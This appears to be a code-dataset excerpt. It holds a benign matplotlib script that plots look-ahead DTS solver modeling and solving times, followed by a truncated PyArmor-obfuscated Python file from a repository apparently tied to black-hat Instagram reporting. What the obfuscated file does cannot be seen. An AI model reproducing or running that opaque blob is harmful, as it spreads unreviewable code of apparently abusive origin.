| 43.233945 | 122 | 0.576764 | 1,178 | 9,425 | 4.334465 | 0.118846 | 0.082256 | 0.023502 | 0.031727 | 0.880924 | 0.880924 | 0.879358 | 0.879358 | 0.879358 | 0.879358 | 0 | 0.023245 | 0.301645 | 9,425 | 217 | 123 | 43.43318 | 0.752507 | 0.012626 | 0 | 0.803279 | 0 | 0.016393 | 0.152001 | 0.049376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.054645 | 0 | 0.071038 | 0.010929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4844ed1b27b7993515d0ab8ac066e478d8a92f4 | 20,607 | py | Python | plotter/agg_01_d030_lookahead_dts_runtime.py | kit-tm/fdeval | f6463c1c7549b8ac7fc39854e87c88d3cac858a0 | [
"BSD-2-Clause"
] | 1 | 2021-11-18T02:46:34.000Z | 2021-11-18T02:46:34.000Z | plotter/agg_01_d030_lookahead_dts_runtime.py | kit-tm/fdeval | f6463c1c7549b8ac7fc39854e87c88d3cac858a0 | [
"BSD-2-Clause"
] | null | null | null | plotter/agg_01_d030_lookahead_dts_runtime.py | kit-tm/fdeval | f6463c1c7549b8ac7fc39854e87c88d3cac858a0 | [
"BSD-2-Clause"
] | null | null | null | import logging, math, json, pickle, os
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.dates as mdates
from datetime import datetime
import matplotlib.patches as patches
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.gridspec as gridspec
import statistics
logger = logging.getLogger(__name__)
from . import agg_2_utils as utils
SHOW_OUTLIERS = False
LOOKAHEAD = [1,2,3,4,5,6,7,8,9]
DATASET_TYPE = 0
def plot(blob, **kwargs):
"Plot look-ahead DTS"
utils.EXPORT_BLOB = blob
macros_ports = []
macros_total = []
total = {}
total_infeasable = {}
data_per_port = {}
includes = ['scenario_switch_cnt', 'scenario_table_capacity',
'scenario_concentrated_switches', 'scenario_edges', 'scenario_bottlenecks',
'scenario_hosts_of_switch']
includes += blob.find_columns('solver_stats_time_modeling')
includes += blob.find_columns('solver_stats_time_solving')
includes += blob.find_columns('timer')
includes += blob.find_columns('hit_timelimit')
# 15 is the maximum number of switches in current experiments (ids 0-14)
for switch_cnt in range(0, 15):
includes.append('dts_%d_solver_cnt_feasable' % (switch_cnt))
includes.append('dts_%d_solver_cnt_infeasable' % (switch_cnt))
includes.append('dts_%d_solver_considered_ports' % (switch_cnt))
includes.append('dts_%d_ctrl_overhead' % (switch_cnt))
includes.append('dts_%d_link_overhead' % (switch_cnt))
includes.append('dts_%d_table_overhead' % (switch_cnt))
includes.append('dts_%d_table_datay_raw' % (switch_cnt))
includes.append('dts_%d_ctrl_overhead_percent' % (switch_cnt))
includes.append('dts_%d_link_overhead_percent' % (switch_cnt))
includes.append('dts_%d_table_overhead_percent' % (switch_cnt))
includes.append('dts_%d_underutil_percent' % (switch_cnt))
blob.include_parameters(**dict.fromkeys(includes, 1))
runs = blob.filter(**dict())
# -----------------------
# prepare data for plotting
# -----------------------
DATA = {}
seeds = []
timercnt = 0
for run in runs:
seed = run.get('param_topo_seed')
param_dts_algo = run.get('param_dts_algo')
param_dts_look_ahead = run.get('param_dts_look_ahead')
if not seed in seeds:
seeds.append(seed)
if not DATA.get(param_dts_algo):
DATA[param_dts_algo] = {}
for switch in range(0, run.get('scenario_switch_cnt')):
if not DATA[param_dts_algo].get((seed, switch)):
DATA[param_dts_algo][(seed, switch)] = {}
DATA[param_dts_algo][(seed, switch)][param_dts_look_ahead] = run
# -----------------------
# Figure: modeling and solving time dts based on look-ahead 1..9 or 1..30
# -----------------------
if 1:
for factor_limit in [9,30]:
for param_dts_algo, DATA1 in DATA.items():
if param_dts_algo == 1 and factor_limit == 30:
continue
plt.close()
fig, axes = plt.subplots(1, 2, figsize=(12, 5))
fig.tight_layout(pad=3)
for ax, label in zip(fig.axes, [r'Modeling time (ms)', r'Solving time (ms)']*2):
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('%s' % label, fontsize=15)
for ax in fig.axes:
ax.set_xlim(1,9)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
color = 'red'
label = 'Select-Opt'
if param_dts_algo == 2:
color = 'blue'
label = 'Select-CopyFirst'
# for this plot, we can only use data where all look-ahead values
# were calculated without timeouts!
use_data = {}
ignore_seeds = []
for seedswitch, DATA2 in DATA1.items():
use = True
seed, switch = seedswitch
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('hit_timelimit'):
use = False
if run.get('dts_%d_ctrl_overhead_percent' % (switch)) == None:
use = False
if use == False:
if not seed in ignore_seeds:
ignore_seeds.append(seed)
for seedswitch, DATA2 in DATA1.items():
seed, switch = seedswitch
if seed not in ignore_seeds:
use_data[seedswitch] = DATA2
result_solver_stats_time_solving = {}
result_solver_stats_time_modeling = {}
for seedswitch, DATA2 in use_data.items():
seed, switch = seedswitch
print(seed, switch)
datax = []
datay = []
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('dts_%d_table_overhead_percent' % (switch)) == 0:
continue
if run.get('dts_%d_solver_cnt_infeasable' % (switch)) == 0:
solver_stats_time_solving = run.get('dts_%d_solver_stats_time_solving' % (switch))
solver_stats_time_modeling = run.get('dts_%d_solver_stats_time_modeling' % (switch))
solver_stats_time_solving = statistics.mean(solver_stats_time_solving) * 1000
solver_stats_time_modeling = statistics.mean(solver_stats_time_modeling) * 1000
try:
result_solver_stats_time_solving[param_dts_look_ahead].append(solver_stats_time_solving)
except KeyError:
result_solver_stats_time_solving[param_dts_look_ahead] = [solver_stats_time_solving]
try:
result_solver_stats_time_modeling[param_dts_look_ahead].append(solver_stats_time_modeling)
except KeyError:
result_solver_stats_time_modeling[param_dts_look_ahead] = [solver_stats_time_modeling]
print("")
print("solving time", param_dts_algo, len(result_solver_stats_time_solving))
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_solving.items()):
if param_dts_look_ahead <= factor_limit:
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
print("len", len(databox), len(datax))
axes[1].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[1].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
print("")
print("modeling time", param_dts_algo)
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_modeling.items()):
if param_dts_look_ahead <= factor_limit:
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
axes[0].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[0].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
if factor_limit > 9:
for ax in fig.axes:
labels = []
for x in range(1,factor_limit):
if x % 2 == 1:
labels.append(''+str(x))
else:
labels.append('')
ax.set_xticklabels(labels)
#h1, l1 = fig.axes[-1].get_legend_handles_labels()
h2, l2 = fig.axes[0].get_legend_handles_labels()
fig.legend(h2, l2, loc='upper center', ncol=2, fontsize=16)
fig.subplots_adjust(top=0.88)
utils.export(fig, 'lookahead_%d_dts_%d_solving.pdf' % (factor_limit, param_dts_algo), folder='lookahead')
# -----------------------
# Figure: rsa times for L=1 to L=30
# -----------------------
if 1:
use_data = {}
for run in runs:
if run.get('param_dts_algo') != 2:
continue
seed = run.get('param_topo_seed')
param_dts_look_ahead = run.get('param_dts_look_ahead')
if not use_data.get((param_dts_look_ahead, seed)):
use_data[(param_dts_look_ahead, seed)] = []
use_data[(param_dts_look_ahead, seed)].append(run)
if len(use_data) > 0:
plt.close()
fig, axes = plt.subplots(1, 2, figsize=(12, 5))
fig.tight_layout(pad=3)
for ax, label in zip(fig.axes, [r'Modeling time (ms)', r'Solving time (ms)']*2):
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('%s' % label, fontsize=15)
for ax in fig.axes:
ax.set_xlim(1,9)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
color = 'blue'
label = 'Select-CopyFirst'
result_solver_stats_time_solving = {}
result_solver_stats_time_modeling = {}
for key, runs in sorted(use_data.items()):
param_dts_look_ahead, seed = key
for run in runs:
solver_stats_time_solving = run.get('rsa_solver_stats_time_solving')
solver_stats_time_modeling = run.get('rsa_solver_stats_time_modeling')
solver_stats_time_solving = statistics.mean(solver_stats_time_solving) * 1000
solver_stats_time_modeling = statistics.mean(solver_stats_time_modeling) * 1000
try:
result_solver_stats_time_solving[param_dts_look_ahead].append(solver_stats_time_solving)
except KeyError:
result_solver_stats_time_solving[param_dts_look_ahead] = [solver_stats_time_solving]
try:
result_solver_stats_time_modeling[param_dts_look_ahead].append(solver_stats_time_modeling)
except KeyError:
result_solver_stats_time_modeling[param_dts_look_ahead] = [solver_stats_time_modeling]
print("")
print("solving time", param_dts_algo)
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_solving.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
axes[1].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[1].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
print("")
print("modeling time", param_dts_algo)
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_modeling.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
axes[0].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[0].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
for ax in fig.axes:
labels = []
for x in range(1,30):
if x % 2 == 1:
labels.append(''+str(x))
else:
labels.append('')
ax.set_xticklabels(labels)
#h1, l1 = fig.axes[-1].get_legend_handles_labels()
h2, l2 = fig.axes[0].get_legend_handles_labels()
fig.legend(h2, l2, loc='upper center', ncol=2, fontsize=16)
fig.subplots_adjust(top=0.88)
utils.export(fig, 'lookahead_rsa30.pdf', folder='lookahead')
# -----------------------
# Figure: modeling and solving time based on look-ahead
# -----------------------
if 0:
plt.close()
fig, axes = plt.subplots(2, 2, figsize=(12, 7))
fig.tight_layout(pad=3)
for ax, label in zip(fig.axes, [r'Modeling time (ms)', r'Solving time (ms)']*2):
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('%s' % label, fontsize=15)
for ax in fig.axes:
ax.set_xlim(1,9)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
for param_dts_algo, DATA1 in DATA.items():
color = 'red'
label = 'Select-Opt'
if param_dts_algo == 2:
color = 'blue'
label = 'Select-CopyFirst'
# for this plot, we can only use data where all look-ahead values
# were calculated without timeouts!
use_data = {}
ignore_seeds = []
for seedswitch, DATA2 in DATA1.items():
use = True
seed, switch = seedswitch
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('hit_timelimit'):
use = False
if run.get('dts_%d_ctrl_overhead_percent' % (switch)) == None:
use = False
if use == False:
if not seed in ignore_seeds:
ignore_seeds.append(seed)
for seedswitch, DATA2 in DATA1.items():
seed, switch = seedswitch
if seed not in ignore_seeds:
use_data[seedswitch] = DATA2
result_solver_stats_time_solving = {}
result_solver_stats_time_modeling = {}
for seedswitch, DATA2 in use_data.items():
seed, switch = seedswitch
datax = []
datay = []
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('dts_%d_table_overhead_percent' % (switch)) == 0:
continue
if run.get('dts_%d_solver_cnt_infeasable' % (switch)) == 0:
solver_stats_time_solving = run.get('dts_%d_solver_stats_time_solving' % (switch))
solver_stats_time_modeling = run.get('dts_%d_solver_stats_time_modeling' % (switch))
solver_stats_time_solving = statistics.mean(solver_stats_time_solving) * 1000
solver_stats_time_modeling = statistics.mean(solver_stats_time_modeling) * 1000
try:
result_solver_stats_time_solving[param_dts_look_ahead].append(solver_stats_time_solving)
except KeyError:
result_solver_stats_time_solving[param_dts_look_ahead] = [solver_stats_time_solving]
try:
result_solver_stats_time_modeling[param_dts_look_ahead].append(solver_stats_time_modeling)
except KeyError:
result_solver_stats_time_modeling[param_dts_look_ahead] = [solver_stats_time_modeling]
print("")
print("solving time", param_dts_algo)
datax = []
datay = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_solving.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
axes[param_dts_algo-1][1].boxplot(result_solver_stats_time_solving.values(), positions=datax, notch=False, showfliers=False)
axes[param_dts_algo-1][1].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
print("")
print("modeling time", param_dts_algo)
datax = []
datay = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_modeling.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
axes[param_dts_algo-1][0].boxplot(result_solver_stats_time_modeling.values(), positions=datax, notch=False, showfliers=False)
axes[param_dts_algo-1][0].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
h1, l1 = fig.axes[-1].get_legend_handles_labels()
h2, l2 = fig.axes[0].get_legend_handles_labels()
fig.legend(h2+h1, l2+l1, loc='upper center', ncol=2, fontsize=16)
fig.subplots_adjust(top=0.90)
utils.export(fig, 'lookahead_dts_solving_times.pdf', folder='lookahead')
exit(1)
# -----------------------
# Figure: infeasible solutions based on look-ahead
# -----------------------
if 0:
plt.close()
fig, ax = plt.subplots(figsize=(10, 4))
fig.tight_layout(pad=2.7)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('Infeasible solutions', fontsize=15)
for param_dts_algo, DATA1 in DATA.items():
color = 'red'
if param_dts_algo == 1:
color = 'blue'
continue
result_solver_cnt_infeasable = {}
result_solver_stats_time_modeling = {}
for seedswitch, DATA2 in DATA1.items():
seed, switch = seedswitch
datax = []
datay = []
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('dts_%d_table_overhead_percent' % (switch)) == 0:
continue
solver_cnt_infeasable = run.get('dts_%d_solver_cnt_infeasable' % (switch))
if solver_cnt_infeasable > 0:
try:
result_solver_cnt_infeasable[param_dts_look_ahead].append(solver_cnt_infeasable)
except KeyError:
result_solver_cnt_infeasable[param_dts_look_ahead] = [solver_cnt_infeasable]
datax = []
datay = []
for param_dts_look_ahead, data in sorted(result_solver_cnt_infeasable.items()):
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
ax.boxplot(result_solver_cnt_infeasable.values(), notch=False, showfliers=False)
ax.plot(datax, datay, color="black", marker='o', linestyle=":", linewidth=2)
plt.show()
exit(1)
| 45.793333 | 137 | 0.552773 | 2,341 | 20,607 | 4.584793 | 0.101239 | 0.056648 | 0.092239 | 0.079195 | 0.827355 | 0.79987 | 0.786173 | 0.771453 | 0.717227 | 0.706606 | 0 | 0.020739 | 0.333139 | 20,607 | 449 | 138 | 45.895323 | 0.760297 | 0.041879 | 0 | 0.728045 | 0 | 0 | 0.083789 | 0.042655 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002833 | false | 0 | 0.028329 | 0 | 0.031161 | 0.056657 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f10948ba7cd2752403cd493f6e8543a493065e5a | 12,107 | py | Python | libs/M4nifest0.py | M4nifest0-Black-Hat-Hacking/M4nifest0_IG_ReportV4 | dcd3258dfabeaee8424215ec56e013a369781ca0 | [
"MIT"
] | 14 | 2021-12-22T16:38:44.000Z | 2022-03-01T16:49:33.000Z | libs/M4nifest0.py | M4nifest0-Black-Hat-Hacking/M4nifest0_IG_ReportV4 | dcd3258dfabeaee8424215ec56e013a369781ca0 | [
"MIT"
] | 1 | 2021-12-24T10:41:10.000Z | 2022-01-05T05:03:37.000Z | libs/M4nifest0.py | M4nifest0-Black-Hat-Hacking/M4nifest0_IG_ReportV4 | dcd3258dfabeaee8424215ec56e013a369781ca0 | [
"MIT"
] | 6 | 2021-12-22T16:34:54.000Z | 2022-01-27T19:58:26.000Z | from pytransform import pyarmor_runtime
pyarmor_runtime()
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x09\x2e\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x7a\x0b\x00\x00\x00\x00\x00\x18\xbe\x83\x3c\x91\xaf\xa0\xba\xcd\xc3\x74\x08\xe9\x11\x7d\xec\x75\x00\x00\x00\x00\x00\x00\x00\x00\x30\x09\xef\xe7\xaf\xc8\xd4\x0f\x2d\x94\x95\x0d\x28\x80\xbc\x9c\x4b\x72\x14\xd3\x6d\x71\x8b\x86\xa7\xf0\xa3\x90\xf2\x3a\x5d\xa6\xf5\x9d\x1f\xf3\x57\xfe\xec\x4f\xe4\xa0\xe7\x14\x2a\x6b\x8e\x2a\xde\x89\x52\x6a\xc4\xd7\x53\xbf\xa4\x59\xa8\xe4\x74\x32\x26\xaf\x3c\x34\x1c\x5c\x4b\xd7\xdd\x78\x43\x40\x89\xdd\xe6\xef\xfa\xf2\x25\x21\xee\x4d\x1f\x82\xcc\xc5\x77\x81\xc5\x99\xbe\xd7\x2d\x0b\x72\xe4\x3c\x97\x67\x54\xae\xc0\xd2\x78\xa8\xe1\x7d\x3e\x61\xca\x2f\x4d\xdc\x0e\x4a\xc5\x00\x17\x96\xb3\xc5\x19\x04\x78\x31\x2f\xf6\xc3\x47\xd9\xab\x71\xa5\x6d\x32\x65\x20\x5a\x85\xd4\xe4\x79\x63\xdc\x83\x06\x59\x96\x14\x29\xd9\xbc\x4e\xaf\x64\xed\x65\x74\x7d\xac\xb0\x97\x60\x30\xa1\x14\x4f\x31\x28\xbd\x13\xd8\x83\x88\x48\xee\xc2\xfa\x56\x3c\xc7\x63\x11\xd7\x50\x8d\x8e\x5c\xc7\xdc\x5a\xea\xf8\x5a\x43\xad\xa4\x99\x73\x4c\xa7\x0c\x1f\x73\x93\x57\xe0\x29\xa1\x5a\xae\xaa\x85\x13\x9a\x1a\x4a\x57\x26\x3a\x26\xf5\x26\x70\x9d\xfb\x4c\xd7\x6e\x93\x81\x22\xd6\xc7\x8c\x4a\x9b\x71\x63\xc5\xc5\xf7\x95\x9c\xf1\x11\x15\xee\x34\xd8\xc5\x20\x7a\x94\xf6\x26\xa7\x48\x75\x7d\xbe\xce\xb9\xed\x56\x74\xc5\x48\x16\x75\xed\xcb\xdd\x9d\x3e\x49\xa8\x40\x86\xbf\x59\xc2\xed\x76\x45\xe1\x98\x5a\x0f\x80\x24\xe4\xf3\xb7\xa7\x80\x56\x3a\xb6\xae\x39\xa5\xa8\x4c\x87\xa2\x62\xed\x91\x5b\xfd\xf3\x01\xdd\x8a\x08\x53\x93\x1f\xb5\x7a\xf6\x9b\xf9\xef\x99\x4b\x8c\x59\x98\x41\x47\x6c\xc7\x0f\x25\xef\x8a\xd3\x17\x24\x94\x8d\xc4\x88\x3a\xe0\x4c\xa2\x74\x48\xd6\x27\xd6\x39\x89\x36\x1b\xc0\xc7\x65\xb1\x34\xb2\x5b\x1e\xd8\x3b\x1d\xb0\x0f\xa9\x99\xaa\x93\x1d\x94\xdb\xf4\x5e\x8e\x12\x23\xa0\xad\x57\x57\x13\x7b\xce\xdd\xd6\xe3\xeb\xe2\xe8\xcb\x7e\x06\xc8\x89\xf4\xae\xb3\x66\xf7\xec\xbc\x58\x31\xa4\x2f\xa3\xda\xa2\x67\xc3\x2b\x1a\x12\x66\x36\xcf\x46\xd1\x
47\x4a\xb2\xff\x95\xe9\x94\x09\x11\x7d\x42\xd3\x25\x74\xa6\xc2\x80\x7d\xba\x84\x43\x21\xa5\x9c\x91\xe7\x12\x09\x80\x8d\x67\xcc\x44\x03\x69\x2f\x8a\xaa\x56\x81\xbd\x7b\xe0\xb8\xb0\xd0\x39\x26\xeb\x2a\xe1\x7b\xa1\x3d\xda\x17\x97\xd4\x3a\xa9\x08\x90\xc6\xc3\x05\xe2\x77\x87\x44\x66\x69\x0b\x76\x5a\xfc\x7d\xac\xd6\xda\x77\x04\x1a\xb6\xa0\x68\x7a\x99\xe0\x38\x25\xee\x08\x27\xad\x27\x66\xad\x0c\xa7\x5a\xe2\xe2\x8f\x62\xa9\x7f\x6b\xc2\x6a\xa1\x1e\xf1\x5f\xce\x67\x6b\x5f\x00\xc5\xd1\xa9\xc3\x26\xe1\x44\x3f\x09\x26\x5e\x1d\xbc\x70\x9a\x34\x63\xb7\xa3\x91\x38\x9d\xd6\x81\x66\xa9\x69\x86\xf4\x27\x15\x0f\x73\xc3\xbe\x44\x49\x28\xca\x74\x98\x07\xd5\xe3\xd1\xe1\xed\xd8\xfa\xb6\xd7\xd6\xd2\xfe\xf5\xa2\x44\x0c\xa9\x3d\x8c\x8f\x76\xde\x52\x47\xfe\xfb\x39\xd9\xf4\x34\x19\x89\x25\xc6\x74\xd7\x03\x41\xfe\x2a\x98\xfd\xf1\x3c\xc5\x6c\xaf\x60\x64\x96\xe7\x00\xfe\xe3\xbf\xd5\xc4\x30\x9b\x1f\xc1\xe4\x35\xb6\xe9\xca\x32\x3e\x79\xd5\xe3\x72\x62\x6a\x12\x9e\x15\xd4\x9f\x73\x7e\xd4\x85\xb4\x9f\xfe\xb2\x34\x42\xdf\x8d\x6c\xdd\x4e\x0c\xf0\xd5\x01\x0b\xcc\x29\xa2\xd1\xe5\x1e\x17\x1b\xdd\xb3\x9d\x52\xfb\xf6\xf1\x94\x25\x73\xb8\x93\xe0\x34\x6d\xcb\xc4\x8f\x12\x96\x97\x47\xa9\x61\xaa\xef\xcf\x3d\xb0\xbb\xdb\xda\x85\x0e\xe1\xd7\xc6\x8e\xe3\xe7\xd2\x64\x04\x30\xc6\x5c\x42\xa3\x2e\xe7\xa0\xbb\xdb\x1a\x13\xb0\x43\x16\x44\x71\xfc\x42\x2f\x9c\xa9\xab\x00\xc7\x53\x17\x0d\x06\x3f\x42\x00\x10\x99\x49\x3c\x3d\x7f\x3f\xf4\xb8\xc3\xea\x3a\xe6\x82\x03\xac\x11\x18\xe7\xe1\x1f\x8d\xe0\x7b\x8d\x4e\x9f\xd8\x6c\x0d\xc0\x62\x53\x30\xd1\xb6\xf6\xb6\x92\x0b\xdc\xba\x14\xb8\xbc\x89\xba\x6f\x60\xe3\x0b\xbc\x64\x78\xa5\x35\x02\x9d\x83\x62\x7e\x20\xf8\xc7\x5f\x17\x5c\xb1\x4a\x8b\xac\x7e\x3d\xf8\xbf\x5d\x82\x7c\x78\x29\x6b\x46\x68\x35\xf9\x10\x6f\x39\x66\x8a\xda\x6d\xa2\xd7\x1d\xb6\xf1\xa3\x2f\x36\xbc\xa1\xb4\x2e\x23\xa3\x49\xe1\x71\x32\x5d\x63\x06\x6e\x81\x25\xa8\x6f\xba\xb0\x35\x63\x4a\xfb\x9a\x6e\x5e\xb3\x2b\x2a\x71\xdf\x34\xdc\x7a\xaf\x67\x58\x0c\xc9\x35\x49\x45\xdc\x07\xcf\xfc\xda\x1f\x88\x28\x9f\xec\xf1\x43\x81\x53\xe1\x
03\x0e\x93\x44\x8b\xdf\x5f\x6a\x18\xad\x6c\x35\xd0\xd5\xbe\x43\x7a\x5a\xc5\xf3\xef\x42\xaf\xf1\x0b\x14\x66\x86\x96\x69\xa8\x20\x69\x56\xb1\x9e\x84\xdf\x95\xb0\x84\x1b\xbe\xf8\x38\x8a\x5d\x9d\x05\x94\x5e\x6f\x74\x87\x36\x4b\x90\xfb\x59\x96\xc1\x79\x99\x06\xc0\x2f\x92\xe2\xff\x3f\xe5\x76\x70\x3b\xaf\x39\xc0\x21\x75\x75\xe6\x54\x86\xb4\xce\x25\xd7\x9b\x5a\xed\x6a\x32\xeb\x59\x47\xfa\x59\x09\xbb\xe6\x25\xb7\xb7\x38\xe9\xd3\x72\x5e\x6b\xc7\x11\x6b\x53\x82\xb8\xd9\xa0\xaf\x0c\x60\xad\xa3\x58\x98\xb1\xd8\xe7\x10\x84\xca\xa2\x4a\xed\x05\xc4\x5f\x9a\x5f\xe5\xc6\x0e\x32\x37\xca\x2c\xfc\xc5\x5f\x7f\xf3\x99\x81\x5d\xd3\x57\x90\xcd\xb5\xb8\xd9\xa7\x64\x46\x6c\x5f\xbc\xfb\xa3\x4e\x59\xb6\x6e\x7b\x96\x70\x7f\xe3\xc6\x19\x1a\xe8\x02\xca\xeb\x17\xfc\xfb\x59\xa4\x71\x1e\x85\x8b\xee\xc6\x81\xcc\xe8\xee\x51\xbe\x98\x61\x0c\xec\x89\x45\xe0\x89\x23\x56\xe1\x67\xd1\xa9\xb0\x8d\x3e\x46\xf0\xa8\xa5\x95\x8b\x29\x41\xcd\x1d\x40\x37\x4c\x17\x14\x1a\xc1\x2f\x27\xfe\x3e\x8a\x9a\xa0\xf2\x7b\xde\x31\xb1\x21\xbe\x9a\x8d\xea\x60\x0b\xbd\x4b\x59\x9e\x0c\x2d\x51\x91\xfb\x2a\x16\x16\x59\x1b\x16\x90\xd2\x07\xae\xb2\x63\x64\xee\xb7\x14\x67\xe5\x07\x96\xdd\xfb\x67\xb6\xcd\xda\x9e\xe9\x7e\xcb\xe1\xff\xf1\x84\x07\x1b\xf1\xc1\x9c\xa5\x49\x21\xb9\xb7\x30\xc4\x57\xea\x5f\x4c\x10\x3b\x04\x48\x3d\x3c\x66\x74\xde\xed\xcc\x03\x27\x18\x1b\x08\x62\x8e\x07\xbb\xdc\x38\xd6\x57\xc6\xaf\xcd\x63\x4d\x8d\xb8\x5b\x17\x0a\xe1\xe4\x52\x81\x03\xd8\x2a\x6b\x79\xe3\x37\x12\x22\xb7\x27\x1d\xf0\x21\x33\x3d\xe4\x75\xc5\x88\xd2\xbc\x3f\xea\x94\xd2\x36\x14\xce\xa1\x7b\x96\xf9\xea\x3e\x40\xce\xd8\x61\x6a\x2d\x27\x4e\xe9\xd1\x5b\x6c\x6c\xae\x3e\x06\x7c\xf4\xe8\x70\x86\xa6\xb8\xe4\x3f\xe9\x99\x51\x2e\xfd\x6f\x35\x9d\x79\xd7\xae\x4b\xb5\x74\x78\xfb\x99\x4b\x45\x45\x62\xac\xae\x92\x6f\xca\xfa\x4e\x28\x3b\x2f\xb7\x8b\x4e\x91\x58\xe0\x60\x9e\xd2\x63\x9a\x62\x59\xc3\x8e\xe7\xfb\x2b\xb1\x44\xf8\x46\xa7\x68\xdf\x06\x44\x81\x8d\x7f\x01\x23\xee\x2c\x11\x10\xa9\xa4\x93\xf7\x78\x03\x34\x66\x84\x4a\x7b\xfc\x5e\xb6\x58\xe2\x28\xd6\x9d\xf6\xc7\xd4\x
4d\x33\xd2\xfd\xe2\x10\x1a\x32\x70\xec\xc3\x77\xc4\xcf\x3a\x2c\x14\x86\x43\x6e\xcd\x96\xa6\x91\xc7\x45\xec\x02\x07\xae\x6b\x35\x23\x29\x1d\xa1\xc4\x8b\x75\x77\xce\xde\xf4\xc4\xcf\xdb\x81\x94\x11\xef\x50\x4d\x9b\xcb\xa7\x75\xa3\x62\x7f\xc6\x9e\x5d\x5d\x16\x04\x4f\x3d\x8e\xc6\xb7\xc6\xeb\x72\x68\x79\x8d\x38\x0a\x02\x0c\x4b\xda\x8b\xc1\x76\xbf\x51\x90\x6e\xeb\xf2\x74\x7c\xa8\x5d\x68\x79\xb8\x2e\xcc\x0b\x92\x80\x9a\x8c\xff\xb3\xaf\x72\x2f\x49\x24\xbd\xce\xe7\x52\x54\x33\xc2\xae\x4e\xc6\x1e\x53\x0c\x72\x54\x6c\xdc\x5e\xf7\x1f\xee\x51\xf1\x54\xe1\x12\xda\x1e\xc4\x63\x7d\xed\x63\xea\x4e\xab\xc1\xf3\x04\xc1\x13\x6d\xed\x84\xa6\xb5\xff\x99\x89\xea\xf5\xd3\xda\x65\x50\x76\x9e\xc1\x4b\x2a\x2e\x59\x08\xe8\xc4\xf1\xa2\xf4\x26\x02\x1b\x1c\x83\x7a\x3b\xbf\x12\x7e\xa7\x70\x08\x4e\x23\xa7\x1d\xbf\xf8\xf5\xcc\xae\x05\x56\x73\xc6\x65\x74\xb2\x84\x24\x0d\x83\xc7\x8f\xe7\x07\x3f\xb0\x05\x5b\x49\x0c\x25\x99\x48\x02\xaa\xf7\xc8\x50\x6a\x3a\x79\x76\x98\xf5\xa2\xe3\xe5\xe1\xef\x00\xd7\x0c\x2f\xe3\xf7\x4